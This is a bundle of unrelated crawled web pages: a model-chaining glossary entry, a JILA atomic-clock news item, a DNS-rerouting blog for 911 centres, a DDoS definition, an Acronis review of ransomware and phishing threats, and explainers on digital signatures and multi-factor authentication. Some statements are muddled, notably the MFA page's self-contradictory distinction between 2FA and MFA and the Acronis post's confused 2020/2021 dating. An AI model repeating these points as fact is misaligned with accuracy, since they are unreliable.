Sign up for the 1Kosmos newsletter, and read more about Why a Secure Web 3.0 Starts with Decentralized Identity and Passwordless Access. | <urn:uuid:bf5ecc8a-4a01-4d00-b78a-6cdb2ad74821> | CC-MAIN-2024-38 | https://www.1kosmos.com/blockchain/web2-web3/ | 2024-09-17T08:03:03Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651750.27/warc/CC-MAIN-20240917072424-20240917102424-00356.warc.gz | en | 0.914063 | 2,068 | 3.25 | 3 |
In the realm of data science, model chaining works by assigning the output of one model as the input of the next one in the sequence. This technique comes in handy when dealing with complex problems that can't be adequately addressed with a single model. For example, in a multi-step forecasting scenario, the predictions made by the first model may serve as the input data for the next model to predict a subsequent time period. Similarly, in a multi-tier classification problem, the primary model may be used to classify the input into broad categories, and then subsequent, more specialized models could further categorize the data within these broad classes.
Model chaining also allows for diverse and sophisticated blends of simple and complex machine learning algorithms, tapping into the strengths of each to achieve superior results. Importantly, while this technique permits greater flexibility and computational efficiency, it requires careful planning and understanding to implement effectively as mistakes early can exponentially impact the final output.
Model chaining allows data scientists to break down complex problems into manageable chunks, evaluate them individually using different models, and then link these solutions together to form a more accurate and comprehensive
Model chaining is invaluable to data science as it expands the capabilities and applications of machine learning algorithms. By breaking down complex problems into simpler sub-problems and asserting a sequence of models to tackle each part, more accurate predictions and richer insights can be derived from the data. Additionally, model chaining allows for the use of different types of models that are best suited for specific sub-tasks within the broader problem. This method also improves the interpretability of machine learning, as each model in the sequence can be evaluated and understood individually, providing clarity to the decision-making process.
In the sphere of large language models, model chaining takes on a unique significance. Large language models are complex, and their output analyses can sometimes be excessively extensive to directly produce specific, useful insights. Model chaining helps in breaking down these analyses into comprehensible segments handled by subsequent models. This sequence of models, each tackling a simpler sub-task, enables better and more nuanced understanding of language by combining context, semantics, and syntax across multiple models. This ultimately leads to more accurate, structured, and insightful responses, improving both the quality and utility of the large language model's output.
For companies leveraging large language models, model chaining can greatly enhance the value they extract from these models. By applying different models to various layers of the language data, they can pull out specific insights with higher accuracy. A sequential use of models gives companies the ability to convert the complexity of human language into analyzable data and valuable input for decision making.
With model chaining, businesses can customize how information gleaned from large language models is processed and interpreted. This customized analysis can support everything from customer sentiment analysis and personalized marketing to sophisticated product recommendations and customer response prediction. Hence, the understanding and application of model chaining can be a critical factor for companies in maximizing the benefits they derive from large language models. | <urn:uuid:b0bb298f-8ffb-4509-87f5-c75764877ab6> | CC-MAIN-2024-38 | https://www.moveworks.com/us/en/resources/ai-terms-glossary/model-chaining | 2024-09-19T21:57:07Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700652067.20/warc/CC-MAIN-20240919194038-20240919224038-00156.warc.gz | en | 0.920499 | 606 | 3.171875 | 3 |
JILA researchers used a three-dimensioned strontium lattice clock to control several arrays of atoms and used a new imaging technique to measure the particlesâ subsequent quantum states, NIST said Wednesday.
The research team created arrays made up of as few as one atom, or as many as five atoms per lattice cell within the atomic clock. The team then triggered the particle interactions using a laser.
Jun Ye, a JILA Fellow, said that the resulting observations could yield knowledge that would make it possible to improve atomic clocks.
Information from the study could also help advance quantum information processing and enhance various kinds of sensors, according to NIST.
NIST sponsored the research effort with NASA, the Defense Advanced Research Projects Agency, Army Research Office, Air Force Office of Scientific Research, National Science Foundation. | <urn:uuid:1012e54e-d3f6-42d0-a2f7-6755aa773c84> | CC-MAIN-2024-38 | https://executivegov.com/2018/11/jila-researchers-successfully-measure-multi-particle-interactions-in-atom-experiment/ | 2024-09-21T02:46:05Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725701427996.97/warc/CC-MAIN-20240921015054-20240921045054-00056.warc.gz | en | 0.9356 | 168 | 2.96875 | 3 |
In our digitally driven world, public safety hinges on the rapid, reliable transmission of critical information to the right responders at the right time. Yet, the Internet, which plays a pivotal role in this exchange, is not immune to disruptions. In this era of emergency services, Public Safety Answering Points (PSAPs) must remain vigilant in the face of Internet downtime, as even brief outages can have life-altering consequences. Fortunately, a lifeline exists in the form of Domain Name System (DNS) rerouting, an innovative technology that can help PSAPs overcome the unique challenges posed by Internet disruptions. In this article, we’ll explore what DNS rerouting entails and how it can be an essential asset to PSAPs during critical moments when the Internet goes down.
What is DNS Rerouting?
The Domain Name System (DNS) is the fundamental architecture underpinning the Internet, translating human-readable domain names into IP addresses. DNS rerouting is the practice of redirecting network traffic to an alternative IP address when the primary server becomes unreachable. This redirection can be enacted manually or automatically, depending on the situation.
The Challenges of Internet Downtime for PSAPs
Before we delve into the utility of DNS rerouting for PSAPs, it’s important to appreciate the unique challenges these organizations face during Internet outages:
Emergency Response Delays: Internet downtime can lead to delayed emergency responses, making it imperative for PSAPs to have a backup plan in place.
Loss of Communication Channels: Disruptions in Internet connectivity can lead to a loss of critical communication channels, making it difficult for first responders to coordinate and share vital information.
Data Retrieval Issues: In emergency situations, immediate access to critical databases and information is paramount. Internet outages can result in an inability to retrieve crucial data.
How DNS Rerouting Can Aid PSAPs
DNS rerouting offers a robust solution to these challenges by enabling PSAPs to redirect traffic to backup servers or resources when their primary servers are rendered unreachable. Here’s how it operates:
DNS Records Configuration: PSAPs configure their DNS records to include failover options. These records guide incoming requests to secondary or backup servers that can be relied upon when the primary server becomes inaccessible.
Continuous Monitoring: DNS rerouting services vigilantly monitor the availability of the primary server. Upon detecting a failure, they swiftly update DNS records to reroute traffic to the designated backup server.
Seamless Traffic Diversion: Incoming requests are seamlessly directed to the backup server, ensuring that PSAPs continue to operate effectively, even during Internet downtime.
Benefits of DNS Rerouting for PSAPs During Internet Downtime
Uninterrupted Emergency Response: DNS rerouting helps PSAPs maintain their accessibility, offering uninterrupted service during Internet outages to swiftly respond to emergencies.
Enhanced Data Redundancy: Configuring DNS to point to backup servers allows PSAPs to maintain data redundancy, reducing the risk of losing critical information during Internet disruptions.
Heightened Resilience: DNS rerouting bolsters the overall resilience of PSAPs. It is a proactive strategy for addressing outages and minimizing service interruptions during crucial moments.
Superior Disaster Recovery: DNS rerouting is an integral component of a comprehensive disaster recovery plan for PSAPs, ensuring that they remain operational when unforeseen circumstances affect Internet connectivity.
By implementing an advanced DNS management system, PSAPs can reroute calls in potentially under a minute during network emergencies. This prevents service interruptions and provides citizens with confidence that 911 will remain available. As NG911 usage expands, proactive resilience measures like DNS rerouting will become essential to ensuring the highest levels of emergency response reliability. Public safety organizations that leverage this capability will be better prepared to maintain 24/7 operability – even when faced with internet instability. | <urn:uuid:ce441726-589b-4eea-afd1-772a28411653> | CC-MAIN-2024-38 | https://carbyne.com/blogs/safeguarding-public-safety-dns-rerouting-as-a-resilience-tool-for-psaps-during-internet-downtime/ | 2024-09-07T18:24:52Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700650898.24/warc/CC-MAIN-20240907162417-20240907192417-00356.warc.gz | en | 0.908825 | 810 | 2.640625 | 3 |
What Is DDoS Attack?
A Distributed Denial of Service (DDoS) attack is a malicious attempt to disrupt the normal traffic of a targeted server, service, or network by overwhelming it with a flood of internet traffic. DDoS attacks achieve effectiveness by utilizing multiple compromised computer systems as sources of attack traffic. Exploited machines can include computers and other networked resources such as IoT devices. By sending multiple requests—from different sources—at the same time, the attacker is able to flood the target with more traffic than it can handle, resulting in a denial of service for legitimate users.
A DDoS attack is a malicious attempt to disrupt the normal traffic of a targeted server, service, or network by overwhelming it with a flood of internet traffic.
Usage and Examples
DDoS attacks are commonly used by malicious actors to target websites, online services, and networks. For example, a DDoS attack could be used to take down a website by flooding it with requests from multiple sources, making it impossible for the website to respond to legitimate requests. DDoS attacks can also be used to target online services, such as gaming servers, or networks, such as a company's internal network. | <urn:uuid:1f3bbe00-558f-43b0-bc26-8a3be8c3f256> | CC-MAIN-2024-38 | https://www.evolvesecurity.com/glossary/ddos-attack | 2024-09-07T17:48:34Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700650898.24/warc/CC-MAIN-20240907162417-20240907192417-00356.warc.gz | en | 0.941453 | 242 | 3.3125 | 3 |
It would be impossible to discuss the top cyberthreats of 2021 without mentioning the COVID-19 pandemic. Apart from the obvious dangers to human health and the economic impact, the pandemic fundamentally altered the digital world this year, including how we work and how we spend our free time online.
As travel ceased, most businesses and services had to switch to primarily online operations. These who were already online had to expand, introducing entirely new processes into their workflows. This rapid shift opened organizations up to cyber threats on a larger scale than ever before.
In 2020, a staggering 31% of global companies were attacked by cyber criminals at least once per day. Over 1,000 had sensitive data stolen and publicly leaked by ransomware gangs. And even when a return to office life is possible, it seems clear that digital operations will remain far more prevalent than in previous years. Understanding the cyber threat landscape is key to staying safe online.
What is a cyber threat?
A cyber threat is a malicious act — or just the possibility of one — that seeks to damage or steal data, or to otherwise disrupt computer networks and systems. Common cyber threats include computer viruses, software vulnerabilities, distributed denial of service attacks (DDoS), and social engineering techniques, such as phishing. Even “offline” events like natural disasters can be considered a cyber threat, as they put systems and data at risk.
Cyber threats may come from a variety of sources, including:
- Criminal gangs
- Corporate spies
- Disgruntled insiders
- Individual hackers
No matter the source, cyber threats are a massive hazard. They threaten not only business health and operations, but even our daily life in this increasingly-digital world. And with AI and automation making cyberattacks easier to carry out, effective cyber protection is critical.
What were the most malicious cyber threats of 2021?
Malicious applications that encrypt — and often steal — sensitive data continued to be a top cybersecurity threat in 2021. According to a report from cyberinsurance provider Coalition, ransomware was responsible for 41% of all cyberinsurance claims this year.
Data is increasingly at the forefront of business operations and decision-making, no matter the industry. Its loss, even temporarily, can have massive financial and reputational damage. Cybercriminals are well aware of this, and their continued strikes and massive ransom demands are indicative of the fact that data recovery is, indeed, worth millions of dollars to many organizations.
COVID-19 scams and other cyber threats
Massive news events lead to a surge in people searching for information online, and the COVID-19 pandemic has been no exception. Those seeking answers — What’s the latest news? How can I stay safe? How do I get financial aid? — had to contend with a huge number of scams and other exploits.
Cybercriminals have taken tried-and-true cyber threats, such as phishing campaigns and malicious email attachments, and themed them after the pandemic. By exploiting anxieties and a general sense of urgency, such attacks often succeed in getting victims looking for answers and assistance to put their better judgment aside.
Attacks on remote work tools
The COVID-19 pandemic has significantly changed the cyber threat landscape. Work-from-anywhere has become the new normal, and 92% of global organizations adopted new technologies this year to facilitate the switch to remote operations. While this has created plenty of new opportunities for vendors, it also highlights the numerous security and privacy risks associated with remote work.
Tools that enable collaboration and remote access to internal company servers are ripe attack targets for cybercriminals, and the rush to adopt new technologies — as well as budgetary and IT staff limitations — has resulted in many organizations pressing forward without properly vetting and configuring their new solutions. As a result, cyberattacks on these targets are frequently successful.
Supply chain attacks
With data at the core of every business — and remote access and collaboration tools increasingly necessary — it’s clear that IT services are no longer optional. Many organizations, especially small and medium businesses, rely on managed service providers (MSPs) for these needs.
It’s no wonder, then, that cybercriminals increasingly see MSPs as a ripe attack target. By compromising a service provider, criminals gain access to potentially hundreds of their customers downstream — far more efficiently than going after SMBs one-by-one. Poorly-configured remote access software is of the most exploited attack vectors, though attackers also take advantage of software vulnerabilities and social engineering techniques to gain access to these providers — and ultimately, their clients.
High-profile ransomware attacks
On July 18, Telecom Argentina — the country’s largest telecommunications provider — was hit by a ransomware attack that encrypted over 18,000 systems, including terminals with highly-sensitive data. The infamous Sodinokibi group demanded an initial ransom of $7.5 million, set to double if not paid within 48 hours.
Only a week later, Garmin — one of the world’s largest wearable device companies — began experiencing a major outage of services and production. Garmin later confirmed this was the result of a WastedLocker ransomware attack. The cybercriminals are believed to have demanded a $10 million ransom, which Garmin reportedly paid — although the company has not publicly verified this.
Canon, the multinational firm specializing in optical and imaging products, fell victim to the Maze ransomware in August. Many of the company’s internal systems were impacted, as was their U.S. website. The Maze operators appear to have stolen over 10 TB of data, including the Social Security numbers and financial account details of thousands of current and former Canon employees.
Rampant pandemic-themed exploitation
In April, the German state of North Rhine-Westphalia (NRW) fell victim to a phishing campaign targeting COVID-19 relief funds. Cybercriminals created a fake version of the NRW’s aid request website, and sent out emails directing Germans to the phony site. When victims filled out the “application,” the attackers captured this personal data and used it to submit their own aid requests through the real website. NRW officials reported that up to 4,000 falsified requests were ultimately granted by the government, resulting in as much as $109 million being sent to the scammers.
The latest version of the notorious TrickBot malware was distributed in a phishing campaign, in which victims received emails that claimed to contain information about free COVID-19 testing. These messages directed users to fill out the attached “form,” which actually contained a malicious script that downloaded the payload after a delay (in order to better avoid detection by anti-malware solutions).
Collaboration tools under siege
As videoconferencing solutions saw explosive user growth this year, they also attracted a lot of unwanted attention from cybercriminals, many of whom immediately began analyzing these applications for exploitable weaknesses.
By mid-April, multiple zero-day vulnerabilities in the Zoom virtual conferencing platform had been identified, and were listed in dark web markets — one exploit being sold for $500,000. Zoom was also the target of a large-scale phishing campaign in which cybercriminals sent out fake password-stealing meeting invitations, taking advantage of user dependency on (and unfamiliarity with) the service.
Similar services were targeted as well. Users of both Microsoft Teams and Cisco Webex had to contend with phishing emails with “notifications” that pointed users towards fake, credential-lifting login pages. In one week, as many as 50,000 Microsoft 365 users were attacked in this manner.
Cybercriminals focus on MSPs
In June, the Canada-based Pivot Technology Solutions was impacted by a partially-successful ransomware strike. Though the attack didn’t manage to encrypt any systems, some personal data — including addresses, Social Insurance Numbers, and payroll information — regarding employees and consultants was exfiltrated.
Global IT services and solutions provider DXC Technology announced in early July a ransomware attack against its Xchanging subsidiary, whose customers include companies in the insurance, financial services, healthcare, defense, and aerospace industries.
Returning cyber threats in 2021
With the pandemic still underway and driving business operational decisions, expect more of these same cyber threats in 2021. Work-from-anywhere is here to stay, and it’s unclear whether we’ll ever make a full return to traditional office setups.
With regard to ransomware, data exfiltration is poised to become bigger than encryption, as cybercriminals strive to maximize success rates and monetize every attack. Strikes against cloud services will only grow alongside the services’ own popularity, taking advantage of improper configurations and weaknesses in the supply chain.
It’s also likely that we’ll continue to see huge increases in the volume and variety of more traditional cyber threats. Advances in automation and data mining allow cybercriminals to rapidly create and iterate new malware variants, using data from corporate websites and social media profiles to personalize each attack. Increased adoption of the internet of things (IoT) is increasing the attack surface dramatically, with smart devices and appliances often being poorly-protected.
Staying safe in the “next normal”
With these challenges ahead, it’s important for businesses to invest in solutions that can meet the top cyber threats head-on and provide comprehensive cyber protection.
Anti-malware agents may stop a cyber threat in progress, but won’t be able to restore any compromised data. Backup agents won’t automatically know about a cyber threat, and data will be recovered slowly — assuming that it hasn’t been compromised. Security patches to fix vulnerabilities in popular software are released frequently, but these are inconsequential if not enabled across your workloads in a timely manner.
To address these issues, we recommend tools like Acronis Cyber Protect — an integrated solution that combines data backup, anti-malware, RMM, vulnerability assessment, and patch management capabilities into a single agent. This level of integration enables optimal performance, eliminates compatibility issues, and ensures rapid automated recovery in the event of a breach.
A Swiss company founded in Singapore in 2003, Acronis has 15 offices worldwide and employees in 50+ countries. Acronis Cyber Protect Cloud is available in 26 languages in 150 countries and is used by over 20,000 service providers to protect over 750,000 businesses. | <urn:uuid:f525be8f-9dde-4ed1-9a86-d888d36a2b62> | CC-MAIN-2024-38 | https://www.acronis.com/en-eu/blog/posts/malicious-cyber-threats-2020/ | 2024-09-08T21:45:21Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651035.2/warc/CC-MAIN-20240908213138-20240909003138-00256.warc.gz | en | 0.953364 | 2,164 | 3.078125 | 3 |
The Quantum and Classical-Quantum Computers in Our Future
(WallStreetJournal) The venerable Wall Street Journal predicts while that the exact nature and scope of quantum computing’s promise has been only vaguely defined today, in the future quantum computers will come in a variety of different sizes and shapes, suited for different purposes. Meanwhile; IBM, Google and Microsoft are big players, as are several university-based research groups and national laboratories around the world.
Quantum computers store information on quantum bits, called qubits that are more intricate than bits and can store information more densely. While qubits are powerful, they’re also delicate and hard to work with.
A promising development is classical-quantum hybrids, in which a classical computer can call on a relatively small quantum “coprocessor” to do critical calculations within its own programs. The coprocessor strategy follows the spirit of Graphical Processing Units (GPUs)—superfast chips that do some specialized operations extremely efficiently. GPUs were originally developed for use in computer games, where they make it possible to update fast-paced displays. But ingenious researchers have exploited them in many other ways.
The hybrid strategy could start to deliver on the promise of quantum computation for chemistry and materials science long before large, general-purpose quantum computers are available—if they ever are. Bring on the QPUs! | <urn:uuid:fb885615-0761-4659-9e0f-4acfdc043164> | CC-MAIN-2024-38 | https://www.insidequantumtechnology.com/news-archive/quantum-classical-quantum-computers-future/ | 2024-09-10T04:56:05Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651196.36/warc/CC-MAIN-20240910025651-20240910055651-00156.warc.gz | en | 0.924799 | 281 | 3.0625 | 3 |
Sanjay Pichaiah, Co-Founder & Vice President, Products & GTM, at Akridata, recently appeared as a guest on DataCamp’s webinar on the power of AI-powered Computer Vision tools in Business. This blog is a recap and introduction to Computer Vision and how it could help your business grow in 2024.
Until very recently, performing data science with image and video data was an incredibly difficult task. But now, advancement in AI-powered tools has allowed more organizations to extract value from visual data, an increasingly important need for businesses. That said, there are still many challenges and subtleties when it comes to working with visual data.
Who uses computer vision?
Computer vision is a form of AI that enables computers to capture, interpret, analyze, predict, and make decisions based on visual (photo and video) data. Computer vision is used across a wide range of fields including in facial recognition software, medical imaging and disease diagnosis, for self-driving vehicles, in security and surveillance, for manufacturing and quality control, retail, and even for agriculture and crop maintenance.
Computer vision is most frequently used for visual inspection, monitoring, and the creation of pictorial or video content that represents data interpretation. Computer vision is increasingly being used by organizations, and with the advancement of new tools, has been more available than ever before.
Getting Started with Computer Vision: Image Classification
One of the most common ways Computer Vision is used, and one of the best ways to get started with Computer Vision, is image classification. Image classification assigns a label or category to an input image, based on the visual content. Think: the videos from a traffic camera that are sorted and labeled by an automated AI tool trained to recognize the differences between cars, trucks, bikes, and pedestrians.
Image classification can be broken down into three simple steps: data collection and preparation, selecting model architecture (i.e. using an off-the-shelf model or building a custom model), and training the model with training datasets.
While image classification is one of the most ubiquitous tasks used by organizations, the task becomes more difficult if the data used for training is biased or messy.
The Common Challenges of Working with Visual Data and Computer Vision
One of the major challenges of incorporating Computer Vision into your business operations effectively is the sheer size and breadth of most visual data sets. Both static image and video data sets are often huge, which makes selecting data for model training difficult. For example, a company relying on cameras to capture a manufacturing process might end up with millions of pictures a day, but not all of those images are useful for training a model to detect a product flaw.
Image classification also increases in complexity with scale. All of the tasks associated with image classification, from storing the data somewhere accessible and searchable, to creating training datasets, to data labeling all become more challenging as datasets grow. And as we discussed, visual datasets are often enormous.
Another common data issue is the use of messy data to train your model. Messy data is false, incomplete, and duplicated. Unfortunately, messy data is often a result of a lack of resources and time to clean, comb through, and curate balanced datasets. Biased datasets can also inadvertently lead to class imbalance and skewed results.
Finally, there’s the challenge of maintaining data security and privacy, and the exorbitant cost often associated with storing and working with massive visual datasets. Unless you are a company that can afford to spend multiple millions of dollars in data storage and model training, your business will most likely have to reduce down to a small subset of data for model, which can also lead to bias.
What’s the best way to solve these common issues? By using modern, automated AI tools that work to clean up data as much as possible and eliminate bias before a Computer Vision model is used for data storage, sorting, labeling, and ultimately interpretation.
The Akridata Difference
Akridata is an AI-powered platform that helps visual data experts connect multiple data sources in order to easily explore, search, and analyze their visual data. Akridata also offers an image-based search to help sift through millions of images in seconds and point out model performance and inaccuracies.
Akridata is designed to help data scientists easily build a high-quality training set to send off to labeling to best support the training of models.
If you’re ready to learn more about extracting value from visual data with modern AI tools, watch the full webinar here. | <urn:uuid:34873a78-745c-44e9-9026-bc23c54af6c8> | CC-MAIN-2024-38 | https://akridata.ai/blog/datacamp-webinar-recap/ | 2024-09-11T09:30:48Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651383.5/warc/CC-MAIN-20240911084051-20240911114051-00056.warc.gz | en | 0.941625 | 931 | 2.640625 | 3 |
Definition of LINE DRIVER in Network Encyclopedia.
What is Line Driver?
Line Driver is a device that can use installed twisted-pair phone lines or leased lines to connect terminals to servers in different parts of a building or in different buildings.
A line driver is essentially a combination of a signal converter and an amplifier for digital signals. The signal converter performs line conditioning, and the amplifier increases the signal strength.
Also called a “short-haul” device, a line driver allows a signal produced by a serial transmission device using an interface such as RS-232 to be carried over a longer distance than the interface standard allows, which for RS-232 is only 15 meters.
How it works
Line drivers are always used in pairs. One line driver is placed at the local site and is connected to the terminal, while the other is located at the remote site and is connected to the server. Line drivers are typically used to extend the maximum distance of serial communication protocols such as RS-232, V.35, X.21, and G.703 and can provide either synchronous or asynchronous communication in various vendor implementations. Considerations for line driver type include full-duplex or half-duplex communication, 2-wire or 4-wire cabling options, and various kinds of connectors.
The most common type of line driver uses an RS-232 serial interface for synchronous transmission of data over installed 4-wire telephone cabling. These line drivers can extend the maximum distance of RS-232 serial transmission from 15 meters to several kilometers.
For intrabuilding connections using line drivers, copper unshielded twisted-pair cabling or the installed telephone lines are typically used. For interbuilding connections, fiber-optic cabling is preferred.
Line drivers are available for almost every kind of communication mode, from 19.2-Kbps RS-232 serial line drivers over 6 kilometers to 2-Mbps single-mode fiber-optic line drivers over 18 kilometers. Line drivers for parallel connections can extend parallel transmission of data from about 6 meters to several kilometers. Line drivers are also used in implementation of T1 lines.
When you use line drivers, your maximum bandwidth and transmission distance are inversely related – that is, the longer the line, the less bandwidth you have. | <urn:uuid:742be81e-d595-43a1-a595-876c6b2e8d54> | CC-MAIN-2024-38 | https://networkencyclopedia.com/line-driver/ | 2024-09-12T11:26:11Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651457.35/warc/CC-MAIN-20240912110742-20240912140742-00856.warc.gz | en | 0.918116 | 467 | 3.5 | 4 |
A short Review on Digital Signatures
by Joe Guerra, Cybersecurity Instructor, Hallmark University
The fundamentals of data security are defined as applying techniques, procedures and other means to protect the confidentiality, availability, and integrity of information. Most of the time the focused scenario is keeping the attackers at a distance, and adding barriers around the information. These barriers vary from physical property fences to technology firewalls to do the job.
Whereas these defenses are essential, what about applying an additional factor that would make the information fruitless to the attacker? What if the data was gibberish in such a way that only the authorized entities can view it while the infiltrators could not? This is the kind of security that cryptography offers: it hides the information in a manner that would leave no opportunity for the threat to read it.
Cryptography offers a range and level of security. It provides the basic protections of confidentiality, integrity, authentication, and non-repudiation. The latter two are in a relational category that has been an issue since the dawn of humanity. Some kind of authentication procedure has been in place in civilization since the advent of writing. Although markings, handwritten signatures or seals were sufficient in those ages, in the now, a more relevant process is necessary for an accelerated global interconnected society. As online transactions exponentially rise daily, there is an escalated demand to ensure authenticity, integrity, and non-repudiation of the entities involved, the asset and information exchanged between the parties and a comprehensive secure provisioned agreement process.
So, how do we provide for this need of authentication, integrity, and non-repudiation in today’s digital civilization? The answer lies in a cryptographic component called Digital Signatures. First of all, digital signatures should not be confused with digitized signatures which is essentially an electronic variation of your actual physical signature. Relatively, digital signatures do adhere to the identity of a party to specific information or piece of data. This cryptographic feature is not for the confidentiality aspect of security. Although, it does establish the integrity of the message and authenticate the sender of the data. Digital signatures come from the public key cryptography concept, which is also referred to as asymmetric cryptography. This cryptography provides better authenticity than its counter-part symmetric cryptography.
What makes symmetric encryption inferior in the authenticity and integrity spectrum? If an individual sends information to a co-worker, the message is encrypted with his secret key and the co-worker, in order to view the message must have the same key for decryption. Now, if the same user wants to send another encrypted message to another individual, another key must be implemented. So, if you factor in copious amounts of colleagues into the equation, the problem lies in keeping track of the keys applied to who. An additional issue is how does the receiver get the copy of the key. E-mailing is not a secure option. In other words, symmetric cryptography does not provide authentication or even non-repudiation. Symmetric cryptography works with the use of the same key to encrypt and decrypt the content. This is only powerful against attacks if you securely store away the key.
Asymmetric cryptography implements two keys as opposed to one. The keys are mathematically conjoined and are titled the public and private key. You make public key transparently known and the private key secure. Here is how asymmetric cryptography operates. Suppose Joe wants to relay a message to Jane. Jane has her private key and keeps it safe, and her public key, which is known to everyone. Joe utilizes Jane’s public key for encrypting a message, Joe then transmits the message, Jane now can only decrypt it with her secure private key. Because she does have sole access to her private key, she goes about to decrypt and view the message. Now, if Jane wanted to respond to Joe, she will need to encrypt her message with Joe’s public key which is also known to everyone and send it. Joe will then have to use his private key to read the response. Appropriately, you can understand the value of asymmetric encryption in using it for digital signing.
Digital signatures are implemented as an industry standard within the whole framework called Public Key Infrastructure (PKI). PKI lays out the factors and limitations for public and private keys correlated with a digital signature. As stated in the scenario above, the private key is the responsibility of the sender and does not in any way share it. The public keys may be free to share and used by anyone, especially to validate the signature of the sender.
Overall, digital signatures have two respective intentions: ensure that the original information was not modified and verify the message does come from the sender. For this to be a success, a two-step cryptographic process takes place. First, the message is hashed, thus creating a digest that is tied to the message. So, if the message is modified, the digest changes and leaves a full indication of tampering, which will violate the integrity principle. Then second, is being able to decrypt the digital signature’s hash encryption with the sender’s public key, thus validating the authenticity of the sender. The person says who he says he is.
In conclusion, while Digital Signatures are quite an effective and efficient practice in eliminating impersonation and data manipulation, they are only as good as long as the organization or individual keeps the private key secure. For as soon as the private key becomes public the digital signature tied to that private key can be maliciously used. With this in mind and with the tremendous amount of trust we have in place for digital signatures and the delicate tasks that we attach to them, the more vulnerable they are becoming and the more damaging they can become.
About the Author
Joe Guerra, Cybersecurity Instructor, Hallmark University. Joe Guerra is a cybersecurity/computer programming instructor at Hallmark University.He has 12 years of teaching/training experience in software and information technology development. Joe has been involved in teaching information systems security and secure software development towards industry certifications. Initially, Joe was a software developer working in Java, PHP, and Python projects. Now, he is focused on training the new generation of cyber first responders at Hallmark University. | <urn:uuid:d8fe3bbd-d994-4ae7-bb9f-da347b928fbe> | CC-MAIN-2024-38 | https://www.cyberdefensemagazine.com/where-do-i-sign/ | 2024-09-15T01:09:57Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651601.85/warc/CC-MAIN-20240914225323-20240915015323-00656.warc.gz | en | 0.946007 | 1,272 | 3.140625 | 3 |
Your internet search and browsing history can be seen by search engines, web browsers, websites, apps and hackers. You should protect your search and browsing history
Multi-factor authentication is important for online security. It helps protect your accounts from being compromised by unauthorized users by adding an extra layer of security. There are several benefits to implementing multi-factor authentication such as reducing password risks and meeting regulatory compliance.
Read on to discover more about the benefits of using multi-factor authentication in your everyday life and business operations.
What is Multi-Factor Authentication?
Multi-Factor Authentication (MFA) is an advanced authentication technique that requires two or more methods of proving a user’s identity in order to access resources or secure information. These authentication methods can include passwords, physical tokens and answers to personal questions. MFA helps to ensure that only authorized users can access their accounts.
Muti-factor authentication, Two-Factor Authentication (2FA) and passwordless authentication are often used interchangeably but do not mean the same things. 2FA refers to using more than one authentication method, whereas MFA refers to using two or more authentication methods. Passwordless authentication is a form of authentication that does not require a password; it can be done by using a fingerprint, a physical security key and other ways that do not require a password.
Types of Multi-Factor Authentication
When it comes to multi-factor authentication, there are several different methods used to verify user identities. Here are some of the most common authentication methods.
Email and text codes
An email or text message is sent to the user that will either link to a verification page or display a one-time code. This code has to be entered before the user can log in to their account.
Websites and other online services often use third-party applications to support mobile authentication. These types of apps generate one-time-use codes that help verify a user’s identity. Some common authenticator applications include Google Authenticator and Microsoft Authenticator. Keeper also functions as an authenticator app.
This type of authentication uses biometric data to recognize and identify a user based on physical characteristics such as fingerprint scans, facial recognition, iris scanning and voice recognition. An example of biometric authentication is Face ID on Apple devices which uses facial recognition to identify users.
Physical security keys
Security keys look like thumb drives and are used by plugging into a computer’s USB port. Unlike other types of authentication, these types of keys have to be physically present in order for a device to be authenticated.
What Are The Benefits of Implementing MFA?
There are many benefits when it comes to implementing MFA in each of your accounts. Here are a few.
1. MFA adds extra layers of security to your accounts
Although used interchangeably, compared to 2FA, MFA offers more security layers. The numerous security measures make sure that only authorized users are able to access their information. Even if cybercriminals manage to access a user’s credentials, they will still need to use another method to confirm identities. The more authorization methods, the more secure accounts will be.
2. MFA gives you total control over who has access to your files
Multi-factor authentication enables a company to have complete control of who does and does not have access to sensitive data. Utilizing two or more authentication methods guarantees that the only people who are able to access the data are those who are authorized to do so. MFA is particularly beneficial to organizations that share information with third parties since oftentimes sensitive information is shared with them insecurely.
3. MFA secures remote working
Cybercriminals frequently attempt to intercept and gain access to a system when an employee is working remotely. MFA can assist in preventing such threats from occurring with adaptive authentication. An adaptive authentication is a form of authentication that confirms user identity by looking at a variety of information such as location, device type, behavior and more.
4. MFA meets regulatory compliance
When it comes to adhering to certain industry standards, implementing multi-factor authentication is essential and oftentimes required. For example, MFA assists healthcare providers in complying with the Health Insurance Portability and Accountability Act (HIPAA) in order to protect patients’ sensitive information.
Additionally, MFA has been made a requirement by many cyber insurance providers in order to obtain coverage. Businesses run the risk of paying a higher premium or perhaps losing their insurance coverage if they do not implement MFA. U.S. President Biden’s Cybersecurity Executive Order also requires that federal agencies implement MFA, which is a development that came after an increase in cyber attacks that included password cracking.
5. MFA takes away password risks
Password risks can be extremely common, especially if you’re not utilizing a password manager. According to Keeper’s 2022 US Password Practices Report, 56% of respondents revealed that they use the same password for multiple accounts. If cybercriminals were to find your duplicate passwords, it makes it easier for them to gain access to multiple of your accounts. By adding MFA, the cybercriminal will not be able to access your accounts without first authenticating who they are.
Along with implementing MFA, it’s important to practice good password hygiene by creating unique and strong passwords for each of your accounts. Strong passwords and MFA are the ultimate combination to keeping all of your data safe and sound.
Stay Protected With MFA
Many people choose to not implement MFA to their accounts, despite the fact that it adds extra layers of security. Our U.S. Password Practices Report revealed that only one in six respondents have used a second step to secure their accounts and have reported that they find it difficult to use. Difficulty in using multi-factor authentication is what has prevented 20% of respondents from using it at all. Learning the benefits of MFA can make everyone understand the importance of implementing it. Plus, it’ll also help them understand that using MFA is not as difficult as it seems.
